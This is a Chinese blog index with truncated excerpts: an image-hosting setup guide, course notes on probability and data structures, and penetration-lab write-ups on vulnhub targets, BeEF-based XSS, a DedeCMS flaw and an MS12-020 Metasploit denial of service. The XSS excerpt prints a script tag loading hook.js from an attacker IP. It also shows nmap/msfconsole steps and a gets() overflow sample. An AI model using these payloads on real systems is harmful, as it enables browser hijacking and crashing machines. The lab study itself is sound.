关于gitee图床挂了转到腾讯云笔记
配置腾讯云COS图床据了解腾讯云COS以前有50G永久免费额度,2019-01-25之后腾讯云对象存储COS免费额度作了调整,现在是50G免费六个月。
进入腾讯云:
点击对象存储之后创建一个桶
访问权限选择公有读私有写,否则图片无法读取,其他的根据自己往下填写就可以。
地域建议和你网站地区一样。
密钥配置点击右上角头像进入API密钥管理,点击新建密钥进行密钥配置
生成的密钥我们后面会用到。
配置picgopicgo的下载以及安装在之前博客提到过,这里不再提及,直接进入配置腾讯云环节:
打开软件,点击【腾讯云COS】,首先将我们上面创建的API密钥粘贴
然后来到我们的【储存桶列表】,将存储桶名称、地域填入PicGo,域名为空即可
然后点击确定,设为默认图床,否则上传不会默认走腾讯云COS。
到这一步腾讯云COS图床配置完毕,下一步就是将gitee项目下载到本地
gitee克隆到本地去到以前的gitee仓库,复制该仓库链接
win+R打开控制台输入:
1git clone https://gitee.com/csrcsyh/note.git
即可将仓库克隆到本地
红色 ...
WebDeveloper靶场练习
WebDeveloper靶场练习发现目标 (netdiscover),找到WebDeveloper的IP地址靶机ip为192.168.222.138
利用NMAP扫描目标主机,发现目标主机端口开放、服务情况1nmap -A -sV --min-parallelism 200 192.168.222.138
开放20与80端口,提供ssh服务以及http服务
目标主机提供了HTTP服务,尝试利用浏览器访问目标网站访问网站,发现该网站是用worldpress来搭的
利用whatweb探测目标网站使用的CMS模板
使用的CMS是wordpress
网络搜索wpscan,简要说明其功能wpscan功能:
WPScan 可以检查以下东西:
安装的 WordPress 版本和任何相关的漏洞
安装了哪些插件以及任何相关的漏洞
安装了哪些主题以及任何相关的漏洞
用户名枚举
通过密码暴力破解使用弱密码的用户
备份和可公开访问的 wp-config.php 文件
可公开访问的数据库转储
如果插件暴露了错误日志
媒体文件枚举
易受攻击的 Timthumb 文件
如果存在 Wo ...
概率论复习
事件的运算以及概率事件及运算
古典概型
几何概型
条件概率,乘法公式
全概率公式,贝叶斯公式
离散型分布律,分布函数离散型分布函数的性质分布函数区间一般是左闭右开
连续型概率密度,分布函数概率密度的性质连续性的概率密度相当于离散型的分布律
连续型分布函数的性质
若单调可导直接套公式
若非单调可导按定义做
五种重要分布
二项分布
泊松分布
均匀分布
指数分布
正态分布
标准正态分布
正态分布性质
离散型二维随机变量
连续型二维随机变量一些公式
例1
例2
连续型二维随机变量函数的分布Z=X+Y型求解方法
相关例题
Z=XY型求解方法
相关例题
Z=MAX{X,Y}型求解方法
例1
例2
数学期望,方差,协方差
一维随机变量期望与方差公式以及一些性质
相关例题离散型
连续型
满足五种分布求期望方差
二维随机变量期望与方差相关例题离散型
连续型
协方差相关性质定义
相关例题
离散型
连续型
切比雪夫不等式定义
例题
中心极限定理独立,同分布中心极限定理
例1
例2
二项分布中心极限定理
例
抽样分布常用统计量及性质
例1
例2
例3
三种常见分布 ...
vulnhub DC1 靶场练习
vulnhub DC1 靶场练习前提准备kali:攻击机
DC1:靶机
两个虚拟机以nat模式连接
收集信息查看本机ip1ifconfig
nmap扫描靶机ip1nmap 192.168.222.0/24
通过nmap寻找到靶机的地址为192.168.222.137
对靶机进行更详细的扫描1nmap -A -sV --min-parallelism 200 192.168.222.137
–min-parallelism 代表调整探测报文的并行度,也就是在扫描同一台主机时会发送很多个探测数据包,这个参数指定的数即nmap一次至少要发多少个数据包。
收集的信息还比较多,有80端口,22端口,111端口,还收集到了该网站用的cms是Drupal 7
通过浏览器打开这个网站看看,访问192.168.222.137
没有发现什么有价值的东西
漏洞利用通常情况下,cms会存在比较多的漏洞,在cms中寻找突破口也是比较简单的。接下来我们就用msf来搜索一下该cms存在的漏洞。
12msfconsole //启动msfconsolesearch drupal //搜索与d ...
渗透实验三xss与sql注入
渗透实验三xss与sql注入XSS部分:利用Beef劫持被攻击者客户端浏览器实验环境搭建角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
两个以桥接模式连接
利用AWVS扫描留言簿网站,发现其存在XSS漏洞
说明存在xss漏洞
Kali使用beef生成恶意代码启动beef
浏览器输入:http://127.0.0.1:3000/ui/panel,Usename与Password均为beef
挂马:将下图所示的Hook URL写入web服务器存在XSS漏洞的留言板中
1<script src="http://192.168.43.96:3000/hook.js"></script>
访问留言簿进行留言访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板
1<script src="http://Kali的IP地址:3000/hoo ...
OWASP TOP 10
OWASP TOP 10OWASP介绍
OWASP是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。我们的使命是使应用软件更加安全,使企业和组织能够对应用安全风险做出更清晰的决策。目前OWASP全球拥有250个分部近7万名会员,共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。
OWASP在业界影响力
OWASP被视为web应用安全领域的权威参考。2009年下列发布的美国国家和国际立法、标准、准则、委员会和行业实务守则参考引用了OWASP。美国联邦贸易委员会(FTC)强烈建议所有企业需遵循OWASP十大WEB弱点防护守则
国际信用卡数据安全技术PCI标准更将其列为必要组件
为美国国防信息系统局(DISA)应用安全和开发清单参考
为欧洲网络与信息安全局(ENISA), 云计算风险评估参考
为美国联邦首席信息官(CIO)理事会,联邦部门和机构使用社会媒体的安全指南
为美国国家安全局/中央安全局, 可管理的网络计划提供参考
为英国GovCERTUK提供SQL注入参考
为欧洲网络与信息安全局(ENISA), 云计算风险评估提供参考
OWASP TOP 10为I ...
数据结构
应用题:5个(50分)
1.树和森林的转换
2.最小生成树(prim或Kruskal)
3.哈夫曼树,WPL
4.字典,线性探查法(成功的AVL)
5.折半查找有序表
6.二叉排序树生成
7.恢复二叉树
程序阅读题:2个(20分)(可能程序设计题的二叉树链表方面,搞几个空给你填)
程序设计题:3个(30分)
1.四个排序考一个
2.二叉树递归建立,非递归遍历或层次遍历,递归找右节点个数
3.顺序表,链表(置逆,删插等)
顺序表and链表顺序表的就地逆置1234567891011121314151617181920typedef int DataType;struct List { //顺序表结构 int Max; //顺序表最大长度 int n; //线性表长度 DataType* elem;};typedef struct List* SeqList;typedef struct Node* PNode;typedef struct Node* LinkList;/*就地逆置顺序表*/void Reverse(SeqList list) ...
DeceCMS v5.7 SP2正式版前台任意修改用户密码修改漏洞复现
DeceCMS v5.7 SP2正式版前台任意修改用户密码修改漏洞复现一、漏洞限制1、只能影响前台账户2、只能修改未设置安全问题的账户
二、影响版本DeDeCMSV5.7SP2 正式版(2018-01-09)
三、漏洞复现1、复现环境PHP 5.6DeDeCMSV5.7SP2 正式版(2018-01-09)
2、复现工具
DeDeCMSV5.7SP2 正式版(2018-01-09)
HackBar/Max HacKBar 插件 (后者火狐专有)
Proxy SwitchyOmega 插件
Burp Suite 抓包工具
phpstudypro 建站工具
Google Chrome/Firefox 浏览器
3、复现过程phpstudy打开Apache和mysql服务
将源码包放在WWW路径下
访问链接http://127.0.0.1/DedeCMS-V5.7-GBK-SP2-Full/uploads/install/index.php
会得到这样的初始界面
点击继续
继续
到这一步的的时候注意数据库密码和管理员密码,一般设成和账号名一致就行,方便记忆
继续
登录管理员后台( ...
通过Metasploit对MS12-020漏洞的简单利用
通过Metasploit对MS12-020漏洞的简单利用前期准备攻击机:kali
靶机:Windows_2003_server(打开3389端口)
环境配置两台虚拟机以NAT模式连接
接着右键单机我的电脑,点击属性
选择远程,将该靶机的远程控制系统打开(3389端口即可开启)
复现过程查看本机ip
nmap扫描网段是否开启3389端口1nmap -p 3389 192.168.222.0/24
发现192.168.222.135开放3389端口
启动Metasploit1msfconsole
搜索ms12-020模块1search ms12-020
利用第一个模块1use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
查看可利用选项1show options
建立连接1set rhost 192.168.222.135
运行1run
成功复现,靶机蓝屏
栈溢出原理
栈溢出原理查阅资料查阅ctfwiki了解栈溢出原理,以此篇笔记记录学习心得。
介绍 ¶栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是
程序必须向栈上写入数据。
写入的数据大小没有被良好地控制。
基本示例 ¶最典型的栈溢出利用是覆盖程序的返回地址为攻击者所控制的地址,当然需要确保这个地址所在的段具有可执行权限。下面,通过一个简单的例子实现栈溢出:
12345678910111213#include <stdio.h>#include <string.h>void success() { puts("You Hava already controlled it."); }void vulnerable() { char s[12]; gets(s); ...